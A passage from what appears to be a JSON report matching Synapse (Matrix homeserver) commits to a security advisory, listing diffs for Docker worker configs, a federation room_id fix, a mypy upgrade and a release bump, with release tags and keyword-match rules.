X-Forwarded-For $remote_addr;", + "- }", + "- \"\"\"", + "-", + "- # Write out the config files", + "-", + "- # Main homeserver config", + "- with open(\"/config/main.yaml\", \"a\") as f:", + "- f.write(homeserver_config)", + "-", + "- # Nginx config", + "- with open(\"/config/nginx.conf\", \"w\") as f:", + "- f.write(nginx_config_template_header)", + "- f.write(nginx_config_body)", + "- f.write(nginx_config_template_end)", + "-", + "- # Supervisord config", + "- with open(\"/config/supervisord.conf\", \"a\") as f:", + "- f.write(supervisord_config)", + "-", + "-", + "-if __name__ == \"__main__\":", + "- main(sys.argv, os.environ)", + "diff --git a/docker/worker_conf/main.conf b/docker/worker_conf/main.conf", + "deleted file mode 100644", + "index 917b82500..000000000", + "--- a/docker/worker_conf/main.conf", + "+++ /dev/null", + "@@ -1,9 +0,0 @@", + "-# A bit of Synapse config file that will be appended to the main homeserver config file.", + "-# It is intended for generate_shared_worker_config.py to add entries to this file to", + "-# disable functionality as equivalent workers are spun up.", + "-", + "-# TODO: extend the existing `listeners` section. This defines the ports that the", + "-# main process will listen on.", + "-", + "-redis:", + "- enabled: true", + "diff --git a/docker/worker_conf/supervisord.conf b/docker/worker_conf/supervisord.conf", + "deleted file mode 100644", + "index 63c898e75..000000000", + "--- a/docker/worker_conf/supervisord.conf", + "+++ /dev/null", + "@@ -1,19 +0,0 @@", + "-[supervisord]", + "-nodaemon=true", + "-", + "-[program:nginx]", + "-command=/usr/sbin/nginx -g \"daemon off;\"", + "-priority=900", + "-stdout_logfile= /dev/stdout", + "-stdout_logfile_maxbytes=0", + "-stderr_logfile=/dev/stderr", + "-stderr_logfile_maxbytes=0", + "-username=www-data", + "-autorestart=true", + "-", + "-[program:synapse_main]", + "-command=/usr/local/bin/python -m synapse.app.homeserver \\", + "- --config-path=/config/homeserver.yaml \\", + "- --config-path=/config/main.yaml", + "-autorestart=unexpected", + "-exitcodes=0", + "diff --git a/docker/workers/log_config_templates/pusher_log.yaml b/docker/workers/log_config_templates/pusher_log.yaml", + "new file mode 100644", + "index 000000000..c2563242a", + "--- /dev/null", + "+++ b/docker/workers/log_config_templates/pusher_log.yaml", + "@@ -0,0 +1,30 @@", + "+version: 1", + "+", + "+formatters:", + "+ precise:", + "+ format: '%(asctime)s - %(name)s - %(lineno)d - %(levelname)s - %(request)s - %(message)s'", + "+", + "+handlers:", + "+ file:", + "+ class: logging.handlers.TimedRotatingFileHandler", + "+ formatter: precise", + "+ filename: \"{{ SYNAPSE_DATA_DIR or '/data' }}/logs/pusher1.log\"", + "+ when: midnight", + "+ backupCount: 3 # Does not include the current log file.", + "+ encoding: utf8", + "+", + "+ console:", + "+ class: logging.StreamHandler", + "+ formatter: precise", + "+", + "+loggers:", + "+ synapse.storage.SQL:", + "+ # beware: increasing this to DEBUG will make synapse log sensitive", + "+ # information such as access tokens.", + "+ level: INFO", + "+", + "+root:", + "+ level: {{ SYNAPSE_LOG_LEVEL or \"INFO\" }}", + "+ handlers: [console]", + "+", + "+disable_existing_loggers: false", + "\\ No newline at end of file", + "diff --git a/docker/workers/log_config_templates/user_dir_log.yaml b/docker/workers/log_config_templates/user_dir_log.yaml", + "new file mode 100644", + "index 000000000..c2563242a", + "--- /dev/null", + "+++ b/docker/workers/log_config_templates/user_dir_log.yaml", + "@@ -0,0 +1,30 @@", + "+version: 1", + "+", + "+formatters:", + "+ precise:", + "+ format: '%(asctime)s - %(name)s - %(lineno)d - %(levelname)s - %(request)s - %(message)s'", + "+", + "+handlers:", + "+ file:", + "+ class: logging.handlers.TimedRotatingFileHandler", + "+ formatter: precise", + "+ filename: \"{{ SYNAPSE_DATA_DIR or '/data' }}/logs/pusher1.log\"", + "+ when: midnight", + "+ backupCount: 3 # Does not include the current log file.", + "+ encoding: utf8", + "+", + "+ console:", + "+ class: logging.StreamHandler", + "+ formatter: precise", + "+", + "+loggers:", + "+ synapse.storage.SQL:", + "+ # beware: increasing this to DEBUG will make synapse log sensitive", + "+ # information such as access tokens.", + "+ level: INFO", + "+", + "+root:", + "+ level: {{ SYNAPSE_LOG_LEVEL or \"INFO\" }}", + "+ handlers: [console]", + "+", + "+disable_existing_loggers: false", + "\\ No newline at end of file", + "diff --git a/docker/workers/pusher.yaml b/docker/workers/pusher.yaml", + "new file mode 100644", + "index 000000000..bf1ccf413", + "--- /dev/null", + "+++ b/docker/workers/pusher.yaml", + "@@ -0,0 +1,13 @@", + "+worker_app: synapse.app.pusher", + "+worker_name: pusher", + "+", + "+# The replication listener on the main synapse process.", + "+worker_replication_host: 127.0.0.1", + "+worker_replication_http_port: 9093", + "+", + "+worker_listeners:", + "+ - type: http", + "+ port: 8083", + "+ resources: []", + "+", + "+worker_log_config: /conf/workers/pusher_log.yaml", + "\\ No newline at end of file", + "diff --git a/docker/workers/user_dir.yaml b/docker/workers/user_dir.yaml", + "new file mode 100644", + "index 000000000..8f5deaf37", + "--- /dev/null", + "+++ b/docker/workers/user_dir.yaml", + "@@ -0,0 +1,13 @@", + "+worker_app: synapse.app.user_dir", + "+worker_name: user_dir", + "+", + "+# The replication listener on the main synapse process.", + "+worker_replication_host: 127.0.0.1", + "+worker_replication_http_port: 9093", + "+", + "+worker_listeners:", + "+ - type: http", + "+ port: 8084", + "+ resources: []", + "+", + "+worker_log_config: /conf/workers/user_dir_log.yaml", + "\\ No newline at end of file" + ], + "changed_files": [ + "docker/Dockerfile-workers", + "docker/configure_workers_and_start.py", + "docker/generate_shared_worker_config.py", + "docker/worker_conf/main.conf", + "docker/worker_conf/supervisord.conf", + "docker/workers/log_config_templates/pusher_log.yaml", + "docker/workers/log_config_templates/user_dir_log.yaml", + "docker/workers/pusher.yaml", + "docker/workers/user_dir.yaml" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: matrix-synapse", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: file", + "relevance": 4 + } + ] + }, + { + "commit_id": "3ce2f303f15f6ac3dc352298972dc6e04d9b7a8b", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1605780333, + "hunks": 32, + "message": "Consistently use room_id from federation request body (#8776) * Consistently use room_id from federation request body Some federation APIs have a redundant `room_id` path param (see https://github.com/matrix-org/matrix-doc/issues/2330). We should make sure we consistently use either the path param or the body param, and the body param is easier. * Kill off some references to \"context\" Once upon a time, \"rooms\" were known as \"contexts\". I think this kills of the last references to \"contexts\".", + "diff": [ + "diff --git a/changelog.d/8776.bugfix b/changelog.d/8776.bugfix", + "new file mode 100644", + "index 000000000..dd7ebbeb8", + "--- /dev/null", + "+++ b/changelog.d/8776.bugfix", + "@@ -0,0 +1 @@", + "+Fix a bug in some federation APIs which could lead to unexpected behaviour if different parameters were set in the URI and the request body.", + "diff --git a/synapse/federation/federation_server.py b/synapse/federation/federation_server.py", + "index 23278e36b..4b6ab470d 100644", + "--- a/synapse/federation/federation_server.py", + "+++ b/synapse/federation/federation_server.py", + "@@ -51,2 +51,3 @@ from synapse.federation.units import Edu, Transaction", + " from synapse.http.endpoint import parse_server_name", + "+from synapse.http.servlet import assert_params_in_dict", + " from synapse.logging.context import (", + "@@ -393,3 +394,3 @@ class FederationServer(FederationBase):", + "- async def on_context_state_request(", + "+ async def on_room_state_request(", + " self, origin: str, room_id: str, event_id: str", + "@@ -516,3 +517,3 @@ class FederationServer(FederationBase):", + " async def on_send_join_request(", + "- self, origin: str, content: JsonDict, room_id: str", + "+ self, origin: str, content: JsonDict", + " ) -> Dict[str, Any]:", + "@@ -520,3 +521,4 @@ class FederationServer(FederationBase):", + "- room_version = await self.store.get_room_version(room_id)", + "+ assert_params_in_dict(content, [\"room_id\"])", + "+ room_version = await self.store.get_room_version(content[\"room_id\"])", + " pdu = event_from_pdu_json(content, room_version)", + "@@ -549,8 +551,7 @@ class FederationServer(FederationBase):", + "- async def on_send_leave_request(", + "- self, origin: str, content: JsonDict, room_id: str", + "- ) -> dict:", + "+ async def on_send_leave_request(self, origin: str, content: JsonDict) -> dict:", + " logger.debug(\"on_send_leave_request: content: %s\", content)", + "- room_version = await self.store.get_room_version(room_id)", + "+ assert_params_in_dict(content, [\"room_id\"])", + "+ room_version = await self.store.get_room_version(content[\"room_id\"])", + " pdu = event_from_pdu_json(content, room_version)", + "@@ -750,8 +751,4 @@ class FederationServer(FederationBase):", + "- async def on_exchange_third_party_invite_request(", + "- self, room_id: str, event_dict: Dict", + "- ):", + "- ret = await self.handler.on_exchange_third_party_invite_request(", + "- room_id, event_dict", + "- )", + "+ async def on_exchange_third_party_invite_request(self, event_dict: Dict):", + "+ ret = await self.handler.on_exchange_third_party_invite_request(event_dict)", + " return ret", + "diff --git a/synapse/federation/transport/server.py b/synapse/federation/transport/server.py", + "index a0933fae8..b53e7a20e 100644", + "--- a/synapse/federation/transport/server.py", + "+++ b/synapse/federation/transport/server.py", + "@@ -442,9 +442,9 @@ class FederationEventServlet(BaseFederationServlet):", + " class FederationStateV1Servlet(BaseFederationServlet):", + "- PATH = \"/state/(?P[^/]*)/?\"", + "+ PATH = \"/state/(?P[^/]*)/?\"", + "- # This is when someone asks for all data for a given context.", + "- async def on_GET(self, origin, content, query, context):", + "- return await self.handler.on_context_state_request(", + "+ # This is when someone asks for all data for a given room.", + "+ async def on_GET(self, origin, content, query, room_id):", + "+ return await self.handler.on_room_state_request(", + " origin,", + "- context,", + "+ room_id,", + " parse_string_from_args(query, \"event_id\", None, required=False),", + "@@ -465,5 +465,5 @@ class FederationStateIdsServlet(BaseFederationServlet):", + " class FederationBackfillServlet(BaseFederationServlet):", + "- PATH = \"/backfill/(?P[^/]*)/?\"", + "+ PATH = \"/backfill/(?P[^/]*)/?\"", + "- async def on_GET(self, origin, content, query, context):", + "+ async def on_GET(self, origin, content, query, room_id):", + " versions = [x.decode(\"ascii\") for x in query[b\"v\"]]", + "@@ -474,3 +474,3 @@ class FederationBackfillServlet(BaseFederationServlet):", + "- return await self.handler.on_backfill_request(origin, context, versions, limit)", + "+ return await self.handler.on_backfill_request(origin, room_id, versions, limit)", + "@@ -489,5 +489,5 @@ class FederationQueryServlet(BaseFederationServlet):", + " class FederationMakeJoinServlet(BaseFederationServlet):", + "- PATH = \"/make_join/(?P[^/]*)/(?P[^/]*)\"", + "+ PATH = \"/make_join/(?P[^/]*)/(?P[^/]*)\"", + "- async def on_GET(self, origin, _content, query, context, user_id):", + "+ async def on_GET(self, origin, _content, query, room_id, user_id):", + " \"\"\"", + "@@ -513,3 +513,3 @@ class FederationMakeJoinServlet(BaseFederationServlet):", + " content = await self.handler.on_make_join_request(", + "- origin, context, user_id, supported_versions=supported_versions", + "+ origin, room_id, user_id, supported_versions=supported_versions", + " )", + "@@ -519,6 +519,6 @@ class FederationMakeJoinServlet(BaseFederationServlet):", + " class FederationMakeLeaveServlet(BaseFederationServlet):", + "- PATH = \"/make_leave/(?P[^/]*)/(?P[^/]*)\"", + "+ PATH = \"/make_leave/(?P[^/]*)/(?P[^/]*)\"", + "- async def on_GET(self, origin, content, query, context, user_id):", + "- content = await self.handler.on_make_leave_request(origin, context, user_id)", + "+ async def on_GET(self, origin, content, query, room_id, user_id):", + "+ content = await self.handler.on_make_leave_request(origin, room_id, user_id)", + " return 200, content", + "@@ -530,3 +530,3 @@ class FederationV1SendLeaveServlet(BaseFederationServlet):", + " async def on_PUT(self, origin, content, query, room_id, event_id):", + "- content = await self.handler.on_send_leave_request(origin, content, room_id)", + "+ content = await self.handler.on_send_leave_request(origin, content)", + " return 200, (200, content)", + "@@ -540,3 +540,3 @@ class FederationV2SendLeaveServlet(BaseFederationServlet):", + " async def on_PUT(self, origin, content, query, room_id, event_id):", + "- content = await self.handler.on_send_leave_request(origin, content, room_id)", + "+ content = await self.handler.on_send_leave_request(origin, content)", + " return 200, content", + "@@ -545,6 +545,6 @@ class FederationV2SendLeaveServlet(BaseFederationServlet):", + " class FederationEventAuthServlet(BaseFederationServlet):", + "- PATH = \"/event_auth/(?P[^/]*)/(?P[^/]*)\"", + "+ PATH = \"/event_auth/(?P[^/]*)/(?P[^/]*)\"", + "- async def on_GET(self, origin, content, query, context, event_id):", + "- return await self.handler.on_event_auth(origin, context, event_id)", + "+ async def on_GET(self, origin, content, query, room_id, event_id):", + "+ return await self.handler.on_event_auth(origin, room_id, event_id)", + "@@ -552,8 +552,8 @@ class FederationEventAuthServlet(BaseFederationServlet):", + " class FederationV1SendJoinServlet(BaseFederationServlet):", + "- PATH = \"/send_join/(?P[^/]*)/(?P[^/]*)\"", + "+ PATH = \"/send_join/(?P[^/]*)/(?P[^/]*)\"", + "- async def on_PUT(self, origin, content, query, context, event_id):", + "- # TODO(paul): assert that context/event_id parsed from path actually", + "+ async def on_PUT(self, origin, content, query, room_id, event_id):", + "+ # TODO(paul): assert that room_id/event_id parsed from path actually", + " # match those given in content", + "- content = await self.handler.on_send_join_request(origin, content, context)", + "+ content = await self.handler.on_send_join_request(origin, content)", + " return 200, (200, content)", + "@@ -562,3 +562,3 @@ class FederationV1SendJoinServlet(BaseFederationServlet):", + " class FederationV2SendJoinServlet(BaseFederationServlet):", + "- PATH = \"/send_join/(?P[^/]*)/(?P[^/]*)\"", + "+ PATH = \"/send_join/(?P[^/]*)/(?P[^/]*)\"", + "@@ -566,6 +566,6 @@ class FederationV2SendJoinServlet(BaseFederationServlet):", + "- async def on_PUT(self, origin, content, query, context, event_id):", + "- # TODO(paul): assert that context/event_id parsed from path actually", + "+ async def on_PUT(self, origin, content, query, room_id, event_id):", + "+ # TODO(paul): assert that room_id/event_id parsed from path actually", + " # match those given in content", + "- content = await self.handler.on_send_join_request(origin, content, context)", + "+ content = await self.handler.on_send_join_request(origin, content)", + " return 200, content", + "@@ -574,5 +574,5 @@ class FederationV2SendJoinServlet(BaseFederationServlet):", + " class FederationV1InviteServlet(BaseFederationServlet):", + "- PATH = \"/invite/(?P[^/]*)/(?P[^/]*)\"", + "+ PATH = \"/invite/(?P[^/]*)/(?P[^/]*)\"", + "- async def on_PUT(self, origin, content, query, context, event_id):", + "+ async def on_PUT(self, origin, content, query, room_id, event_id):", + " # We don't get a room version, so we have to assume its EITHER v1 or", + "@@ -591,3 +591,3 @@ class FederationV1InviteServlet(BaseFederationServlet):", + " class FederationV2InviteServlet(BaseFederationServlet):", + "- PATH = \"/invite/(?P[^/]*)/(?P[^/]*)\"", + "+ PATH = \"/invite/(?P[^/]*)/(?P[^/]*)\"", + "@@ -595,4 +595,4 @@ class FederationV2InviteServlet(BaseFederationServlet):", + "- async def on_PUT(self, origin, content, query, context, event_id):", + "- # TODO(paul): assert that context/event_id parsed from path actually", + "+ async def on_PUT(self, origin, content, query, room_id, event_id):", + "+ # TODO(paul): assert that room_id/event_id parsed from path actually", + " # match those given in content", + "@@ -618,5 +618,3 @@ class FederationThirdPartyInviteExchangeServlet(BaseFederationServlet):", + " async def on_PUT(self, origin, content, query, room_id):", + "- content = await self.handler.on_exchange_third_party_invite_request(", + "- room_id, content", + "- )", + "+ content = await self.handler.on_exchange_third_party_invite_request(content)", + " return 200, content", + "diff --git a/synapse/handlers/federation.py b/synapse/handlers/federation.py", + "index c38695770..e03caea25 100644", + "--- a/synapse/handlers/federation.py", + "+++ b/synapse/handlers/federation.py", + "@@ -57,2 +57,3 @@ from synapse.events.validator import EventValidator", + " from synapse.handlers._base import BaseHandler", + "+from synapse.http.servlet import assert_params_in_dict", + " from synapse.logging.context import (", + "@@ -2688,3 +2689,3 @@ class FederationHandler(BaseHandler):", + " async def on_exchange_third_party_invite_request(", + "- self, room_id: str, event_dict: JsonDict", + "+ self, event_dict: JsonDict", + " ) -> None:", + "@@ -2696,8 +2697,7 @@ class FederationHandler(BaseHandler):", + " Args:", + "- room_id: The ID of the room.", + "-", + "- event_dict (dict[str, Any]): Dictionary containing the event body.", + "+ event_dict: Dictionary containing the event body.", + " \"\"\"", + "- room_version = await self.store.get_room_version_id(room_id)", + "+ assert_params_in_dict(event_dict, [\"room_id\"])", + "+ room_version = await self.store.get_room_version_id(event_dict[\"room_id\"])", + "diff --git a/tests/handlers/test_federation.py b/tests/handlers/test_federation.py", + "index 9ef80fe50..bf866dacf 100644", + "--- a/tests/handlers/test_federation.py", + "+++ b/tests/handlers/test_federation.py", + "@@ -61,3 +61,2 @@ class FederationTestCase(unittest.HomeserverTestCase):", + " d = self.handler.on_exchange_third_party_invite_request(", + "- room_id=room_id,", + " event_dict={" + ], + "changed_files": [ + "changelog.d/8776.bugfix", + "synapse/federation/federation_server.py", + "synapse/federation/transport/server.py", + "synapse/handlers/federation.py", + "tests/handlers/test_federation.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8776": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.23.1", + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: reference, issue, request, federation, know", + "relevance": 4 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: server, federation", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8776", + "relevance": 2 + } + ] + }, + { + "commit_id": "8a02d38ce274db40e5629c882af1fefdb8c9adc3", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607689969, + "hunks": 7, + "message": "Update mypy to 0.790 to resolve mypy CI errors (#72)", + "diff": [ + "diff --git a/changelog.d/72.bugfix b/changelog.d/72.bugfix", + "new file mode 100644", + "index 000000000..7ebd16f43", + "--- /dev/null", + "+++ b/changelog.d/72.bugfix", + "@@ -0,0 +1 @@", + "+Update the version of mypy to 0.790.", + "diff --git a/synapse/handlers/auth.py b/synapse/handlers/auth.py", + "index 00eae9205..8770e4363 100644", + "--- a/synapse/handlers/auth.py", + "+++ b/synapse/handlers/auth.py", + "@@ -1117,3 +1117,3 @@ class AuthHandler(BaseHandler):", + "- def _do_validate_hash():", + "+ def _do_validate_hash(checked_hash: bytes):", + " # Normalise the Unicode in the password", + "@@ -1123,3 +1123,3 @@ class AuthHandler(BaseHandler):", + " pw.encode(\"utf8\") + self.hs.config.password_pepper.encode(\"utf8\"),", + "- stored_hash,", + "+ checked_hash,", + " )", + "@@ -1130,3 +1130,5 @@ class AuthHandler(BaseHandler):", + "- return await defer_to_thread(self.hs.get_reactor(), _do_validate_hash)", + "+ return await defer_to_thread(", + "+ self.hs.get_reactor(), _do_validate_hash, stored_hash", + "+ )", + " else:", + "diff --git a/synapse/python_dependencies.py b/synapse/python_dependencies.py", + "index 0ddead8a0..3e188cd4d 100644", + "--- a/synapse/python_dependencies.py", + "+++ b/synapse/python_dependencies.py", + "@@ -109,2 +109,4 @@ CONDITIONAL_REQUIREMENTS = {", + "+CONDITIONAL_REQUIREMENTS[\"mypy\"] = [\"mypy==0.790\", \"mypy-zope==0.2.8\"]", + "+", + " ALL_OPTIONAL_REQUIREMENTS = set() # type: Set[str]", + "diff --git a/tox.ini b/tox.ini", + "index 0a2d14aec..300417287 100644", + "--- a/tox.ini", + "+++ b/tox.ini", + "@@ -161,8 +161,5 @@ commands=", + " [testenv:mypy]", + "-skip_install = True", + " deps =", + " {[base]deps}", + "- mypy==0.782", + "- mypy-zope", + "-extras = all", + "+extras = all, mypy", + " commands = mypy" + ], + "changed_files": [ + "changelog.d/72.bugfix", + "synapse/handlers/auth.py", + "synapse/python_dependencies.py", + "tox.ini" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "72": "" + }, + "cve_refs": [], + "twins": [], + "tags": [], + "matched_rules": [ + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: resolve", + "relevance": 4 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: python", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 72", + "relevance": 2 + } + ] + }, + { + "commit_id": "1cec3d145770b52a7588cdf9df552189da634c5f", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607510499, + "hunks": 4, + "message": "1.23.1", + "diff": [ + "diff --git a/changelog.d/8776.bugfix b/changelog.d/8776.bugfix", + "deleted file mode 100644", + "index dd7ebbeb8..000000000", + "--- a/changelog.d/8776.bugfix", + "+++ /dev/null", + "@@ -1 +0,0 @@", + "-Fix a bug in some federation APIs which could lead to unexpected behaviour if different parameters were set in the URI and the request body.", + "diff --git a/changelog.d/8898.misc b/changelog.d/8898.misc", + "deleted file mode 100644", + "index bdb0d40d5..000000000", + "--- a/changelog.d/8898.misc", + "+++ /dev/null", + "@@ -1 +0,0 @@", + "-Add a maximum version for pysaml2 on Python 3.5.", + "diff --git a/debian/changelog b/debian/changelog", + "index 4ea4feddd..0342fafdd 100644", + "--- a/debian/changelog", + "+++ b/debian/changelog", + "@@ -1 +1,7 @@", + "+matrix-synapse-py3 (1.23.1) stable; urgency=medium", + "+", + "+ * New synapse release 1.23.1.", + "+", + "+ -- Synapse Packaging team Wed, 09 Dec 2020 10:40:39 +0000", + "+", + " matrix-synapse-py3 (1.23.0) stable; urgency=medium", + "diff --git a/synapse/__init__.py b/synapse/__init__.py", + "index 65c1f5aa3..c38a8f613 100644", + "--- a/synapse/__init__.py", + "+++ b/synapse/__init__.py", + "@@ -50,3 +50,3 @@ except ImportError:", + "-__version__ = \"1.23.0\"", + "+__version__ = \"1.23.1\"" + ], + "changed_files": [ + "changelog.d/8776.bugfix", + "changelog.d/8898.misc", + "debian/changelog", + "synapse/__init__.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.23.1", + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + 